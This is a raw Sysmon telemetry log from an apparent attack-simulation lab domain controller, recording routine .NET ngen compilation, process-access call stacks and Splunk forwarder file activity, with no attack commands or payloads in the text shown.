21:07:14.826{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C705-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C705-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C705-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-A282-60D3-C605-00000000CF01}4100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7SPHU597M8\System.Data.Services.Client.ni.dll.auxMD5=39CEACC43388926F1107B7ABB511AC9D,SHA256=A36FB0EFF76405B902F734B86161680F2360B0994A94C3D5B56AA463AEFD650A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.811{4DB9351A-A282-60D3-C605-00000000CF01}4100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7SPHU597M8\System.Data.Services.Client.ni.dllMD5=5DF1073391826E179073699E72362C35,SHA256=EDFB61F94E0D2EAF07492784F6819B4EE35514BF167175C88845E12C154D2934,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.717{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23922FE8BE6239C092B8D3185F2F49F5,SHA256=012DBC44DBA0D26D803856A4A18603FC8C573F7EFF5616AA16F36D08FCA76895,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.576{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt2021-06-23 21:07:14.576 10341000x800000000000000023532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:14.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C605-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C605-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:14.530{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C605-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-A282-60D3-C505-00000000CF01}3928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1A2KLPYYTV\System.Data.Services.ni.dll.auxMD5=DD15555E62E4799C45C6B8DB498BBC0B,SHA256=8181C22CC38083A4944CF66B3A05EA7DAC5EC9D8F277AB1EEA56B54CD420B948,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.530{4DB9351A-A282-60D3-C505-00000000CF01}3928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1A2KLPYYTV\System.Data.Services.ni.dllMD5=B68F7B89BE351EF3A8198D74FF5CCD86,SHA256=5C8B819FA6BE4E38F72C548D5A900A9BC1EF506927FB1CC0951EA06A57DBC284,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C505-00000000CF01}3928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.358{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C505-00000000CF01}3928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:14.358{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C505-00000000CF01}3928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.342{4DB9351A-A282-60D3-C405-00000000CF01}6428NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FMFB2Y8AI8\System.Data.OracleClient.ni.dll.auxMD5=331240F16F416FBE7D3FC54A6D916507,SHA256=BE6C9A08E21F43BF25C5B73826E098868B48C26BF351AAE27173BFF930B02B27,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.342{4DB9351A-A282-60D3-C405-00000000CF01}6428NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FMFB2Y8AI8\System.Data.OracleClient.ni.dllMD5=726140BA4CB6DABD3F9A8D9E68F7545C,SHA256=550FC1FE51B420F3FFE0B87D3BB4EEA9F4AB16453EAB5BA702E6C524A0ACF674,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD0B038FBB56677A9ABBEC784EEF67E8,SHA256=E547BCA93FF901ECC428C863E79AAAA7DC88EF04557A4B40F9D171984F0491DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C405-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C405-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C405-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-A281-60D3-C305-00000000CF01}2196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G4KPA63ZUN\System.Data.ni.dll.auxMD5=67A266D123A5B25CE06C3B664F99A9F8,SHA256=2A1F8C79C854E56C222279D13ED888FA8F209B8D82B836563EDF690CA64D0770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.217{4DB9351A-A281-60D3-C305-00000000CF01}2196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G4KPA63ZUN\System.Data.ni.dllMD5=B2FCE48D8D4D14020A1F2272EE23CE2D,SHA256=32C487ED7E407B3C5E9E3981C2498C07A2BB235CA30DE0CBAF1483AA87789905,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.748{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82B86C9F88162434113ACB8839D3434A,SHA256=4C8C912D0E03F3F864B03D98F24A67F2BBFB2AE71CCE866A18A82248168E2D83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:15.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A283-60D3-CB05-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A283-60D3-CB05-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:15.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A283-60D3-CB05-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.686{4DB9351A-A283-60D3-CA05-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WO37GBXPBI\System.Deployment.ni.dll.auxMD5=B1300A7345D1AE92B9FBD8A1DD463080,SHA256=BB88439B6EF981E5A0150EF49EADF03D8CEB83782DBCF17B52D1BD7BC73A68A8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.686{4DB9351A-A283-60D3-CA05-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WO37GBXPBI\System.Deployment.ni.dllMD5=20DF76A1DF1036D461AE061D629B5607,SHA256=2835B56124E58AFD09D1D48749153CD76993CC28CEE86246A4C6A703FEA37925,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.576{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=967C186DF7BE8E139B68893044E5286E,SHA256=99FC2417505100A62F26FE095F250DD9B74F168A9B0CF731CB6DA950A8C67A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.530{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A283-60D3-CA05-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A283-60D3-CA05-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 